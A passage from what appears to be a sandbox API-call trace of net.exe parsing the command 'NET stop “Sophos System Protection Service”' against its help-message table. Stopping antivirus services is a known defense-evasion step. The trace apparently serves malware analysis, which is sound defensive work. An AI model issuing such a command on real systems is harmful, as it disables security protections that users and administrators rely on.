_MaxCount=0x2f) returned 19 [0038.499] LocalFree (hMem=0x543f98) returned 0x0 [0038.499] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0x58 [0038.499] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN[:domainna", _MaxCount=0x2f) returned -1 [0038.499] LocalFree (hMem=0x545888) returned 0x0 [0038.499] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0x184 [0038.499] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\computername\\share", _MaxCount=0x2f) returned -2 [0038.500] LocalFree (hMem=0x545888) returned 0x0 [0038.500] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0xc7 [0038.500] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET USER\r\n[username [password | *] [options]] [", _MaxCount=0x2f) returned -2 [0038.500] LocalFree (hMem=0x545888) returned 0x0 [0038.500] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0x47 [0038.500] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | [/ALL] | /", _MaxCount=0x2f) returned -3 [0038.500] LocalFree (hMem=0x545888) returned 0x0 [0038.500] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0xc2 [0038.500] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONFIG | CONTI", _MaxCount=0x2f) returned 19 [0038.500] LocalFree (hMem=0x545888) returned 0x0 [0038.500] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0x319 [0038.500] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="SERVICES\r\nNET START can be used to start servic", _MaxCount=0x2f) returned -5 [0038.500] LocalFree (hMem=0x545888) returned 0x0 [0038.500] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0x483 [0038.500] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="SYNTAX\r\nThe following conventions are used to i", _MaxCount=0x2f) returned -5 [0038.500] LocalFree (hMem=0x545888) returned 0x0 [0038.500] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0xa86 [0038.500] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="NAMES\r\nThe following types of names are used wi", _MaxCount=0x2f) returned 4 [0038.500] LocalFree (hMem=0x545888) returned 0x0 [0038.500] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0x54 [0038.500] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection ServiceΓÇ¥", _String2="\r\nFor more information on tools see the command", _MaxCount=0x2f) returned 97 [0038.500] LocalFree (hMem=0x545888) returned 0x0 [0038.500] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0xad [0038.500] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes", _MaxCount=0x24) returned 18 [0038.500] LocalFree (hMem=0x545888) returned 0x0 [0038.501] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x2e [0038.501] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET COMPUTER\r\n\\\\computername {/ADD |", _MaxCount=0x24) returned 16 [0038.501] LocalFree (hMem=0x543f98) returned 0x0 [0038.501] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0x7d [0038.501] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:", _MaxCount=0x24) returned 16 [0038.501] LocalFree (hMem=0x545888) returned 0x0 [0038.501] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x26 [0038.501] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n", _MaxCount=0x24) returned 16 [0038.501] LocalFree (hMem=0x543f98) returned 0x0 [0038.501] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x19 [0038.501] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 16 [0038.501] LocalFree (hMem=0x543f98) returned 0x0 [0038.501] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x1b [0038.501] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x24) returned 13 [0038.501] LocalFree (hMem=0x543f98) returned 0x0 [0038.501] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0xbe [0038.501] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET GROUP\r\n[groupname [/COMMENT:\"tex", _MaxCount=0x24) returned 12 [0038.501] LocalFree (hMem=0x545888) returned 0x0 [0038.501] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x33 [0038.501] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET co", _MaxCount=0x24) returned 11 [0038.501] LocalFree (hMem=0x543f98) returned 0x0 [0038.501] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x19 [0038.501] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x24) returned 11 [0038.501] LocalFree (hMem=0x543f98) returned 0x0 [0038.501] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0xc1 [0038.501] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT", _MaxCount=0x24) returned 7 [0038.501] LocalFree (hMem=0x545888) returned 0x0 [0038.501] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x16 [0038.501] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x24) returned 3 [0038.501] LocalFree (hMem=0x543f98) returned 0x0 [0038.501] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x33 [0038.501] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET SESSION\r\n[\\\\computername] [/DELE", _MaxCount=0x24) returned 15 [0038.501] LocalFree (hMem=0x543f98) returned 0x0 [0038.501] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0x234 [0038.502] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET SHARE\r\nsharename\r\n shar", _MaxCount=0x24) returned 12 [0038.502] LocalFree (hMem=0x545888) returned 0x0 [0038.502] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x13 [0038.502] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET START BROWSER\r\n", _MaxCount=0x24) returned 14 [0038.502] LocalFree (hMem=0x543f98) returned 0x0 [0038.502] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x14 [0038.502] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x24) returned 14 [0038.502] LocalFree (hMem=0x543f98) returned 0x0 [0038.502] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x14 [0038.502] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET START EVENTLOG\r\n", _MaxCount=0x24) returned 14 [0038.502] LocalFree (hMem=0x543f98) returned 0x0 [0038.502] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.502] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET START MESSENGER\r\n", _MaxCount=0x24) returned 14 [0038.502] LocalFree (hMem=0x543f98) returned 0x0 [0038.502] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.502] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET START NET LOGON\r\n", _MaxCount=0x24) returned 14 [0038.502] LocalFree (hMem=0x543f98) returned 0x0 [0038.502] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x16 [0038.502] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x24) returned 14 [0038.502] LocalFree (hMem=0x543f98) returned 0x0 [0038.502] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x11 [0038.502] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET START RPCSS\r\n", _MaxCount=0x24) returned 14 [0038.502] LocalFree (hMem=0x543f98) returned 0x0 [0038.502] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x14 [0038.502] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET START SCHEDULE\r\n", _MaxCount=0x24) returned 14 [0038.502] LocalFree (hMem=0x543f98) returned 0x0 [0038.502] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x12 [0038.502] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET START SERVER\r\n", _MaxCount=0x24) returned 14 [0038.502] LocalFree (hMem=0x543f98) returned 0x0 [0038.502] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0xf [0038.502] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET START UPS\r\n", _MaxCount=0x24) returned 14 [0038.502] LocalFree (hMem=0x543f98) returned 0x0 [0038.502] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x17 [0038.502] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET START WORKSTATION\r\n", _MaxCount=0x24) returned 14 [0038.502] LocalFree (hMem=0x543f98) returned 0x0 [0038.502] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x18 [0038.503] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x24) returned 14 [0038.503] LocalFree (hMem=0x543f98) returned 0x0 [0038.503] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x2a [0038.503] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET STATISTICS\r\n[WORKSTATION | SERVE", _MaxCount=0x24) returned 14 [0038.503] LocalFree (hMem=0x543f98) returned 0x0 [0038.503] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.503] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x24) returned 19 [0038.503] LocalFree (hMem=0x543f98) returned 0x0 [0038.503] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0x58 [0038.503] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAI", _MaxCount=0x24) returned -1 [0038.503] LocalFree (hMem=0x545888) returned 0x0 [0038.503] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0x184 [0038.503] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET USE\r\n[devicename | *] [\\\\compute", _MaxCount=0x24) returned -2 [0038.503] LocalFree (hMem=0x545888) returned 0x0 [0038.503] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0xc7 [0038.503] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET USER\r\n[username [password | *] [", _MaxCount=0x24) returned -2 [0038.503] LocalFree (hMem=0x545888) returned 0x0 [0038.503] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0x47 [0038.503] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET VIEW\r\n[\\\\computername [/CACHE] |", _MaxCount=0x24) returned -3 [0038.503] LocalFree (hMem=0x545888) returned 0x0 [0038.503] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0xc2 [0038.503] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CON", _MaxCount=0x24) returned 19 [0038.503] LocalFree (hMem=0x545888) returned 0x0 [0038.503] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0x319 [0038.503] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="SERVICES\r\nNET START can be used to s", _MaxCount=0x24) returned -5 [0038.503] LocalFree (hMem=0x545888) returned 0x0 [0038.503] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0x483 [0038.503] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="SYNTAX\r\nThe following conventions ar", _MaxCount=0x24) returned -5 [0038.503] LocalFree (hMem=0x545888) returned 0x0 [0038.503] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0xa86 [0038.503] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="NAMES\r\nThe following types of names ", _MaxCount=0x24) returned 4 [0038.503] LocalFree (hMem=0x545888) returned 0x0 [0038.503] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0x54 [0038.504] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System Protection", _String2="\r\nFor more information on tools see ", _MaxCount=0x24) returned 97 [0038.504] LocalFree (hMem=0x545888) returned 0x0 [0038.504] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*墈T龜*") returned 0xad [0038.504] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET ACCOUNTS\r\n[/FORCELOGO", _MaxCount=0x19) returned 18 [0038.504] LocalFree (hMem=0x545888) returned 0x0 [0038.504] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x2e [0038.504] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET COMPUTER\r\n\\\\computern", _MaxCount=0x19) returned 16 [0038.504] LocalFree (hMem=0x543f98) returned 0x0 [0038.504] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0x7d [0038.504] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET CONFIG SERVER\r\n[/AUTO", _MaxCount=0x19) returned 16 [0038.504] LocalFree (hMem=0x545888) returned 0x0 [0038.504] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x26 [0038.504] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET CONFIG\r\n[SERVER | WOR", _MaxCount=0x19) returned 16 [0038.504] LocalFree (hMem=0x543f98) returned 0x0 [0038.504] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x19 [0038.504] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 16 [0038.504] LocalFree (hMem=0x543f98) returned 0x0 [0038.504] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x1b [0038.504] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET FILE\r\n[id [/CLOSE]]\r\n", _MaxCount=0x19) returned 13 [0038.504] LocalFree (hMem=0x543f98) returned 0x0 [0038.504] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0xbe [0038.504] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET GROUP\r\n[groupname [/C", _MaxCount=0x19) returned 12 [0038.504] LocalFree (hMem=0x545888) returned 0x0 [0038.504] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x33 [0038.504] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET HELP\r\ncommand\r\n -", _MaxCount=0x19) returned 11 [0038.504] LocalFree (hMem=0x543f98) returned 0x0 [0038.504] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x19 [0038.504] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x19) returned 11 [0038.504] LocalFree (hMem=0x543f98) returned 0x0 [0038.504] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0xc1 [0038.504] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET LOCALGROUP\r\n[groupnam", _MaxCount=0x19) returned 7 [0038.504] LocalFree (hMem=0x545888) returned 0x0 [0038.504] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x16 [0038.504] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 3 [0038.505] LocalFree (hMem=0x543f98) returned 0x0 [0038.505] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x33 [0038.505] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET SESSION\r\n[\\\\computern", _MaxCount=0x19) returned 15 [0038.505] LocalFree (hMem=0x543f98) returned 0x0 [0038.505] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="墈T⡋瓢琉*㾘T龜*") returned 0x234 [0038.505] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x19) returned 12 [0038.505] LocalFree (hMem=0x545888) returned 0x0 [0038.505] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*墈T龜*") returned 0x13 [0038.505] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET START BROWSER\r\n", _MaxCount=0x19) returned 14 [0038.505] LocalFree (hMem=0x543f98) returned 0x0 [0038.505] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x14 [0038.505] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x19) returned 14 [0038.505] LocalFree (hMem=0x543f98) returned 0x0 [0038.505] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x14 [0038.505] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET START EVENTLOG\r\n", _MaxCount=0x19) returned 14 [0038.505] LocalFree (hMem=0x543f98) returned 0x0 [0038.505] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.505] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET START MESSENGER\r\n", _MaxCount=0x19) returned 14 [0038.505] LocalFree (hMem=0x543f98) returned 0x0 [0038.505] 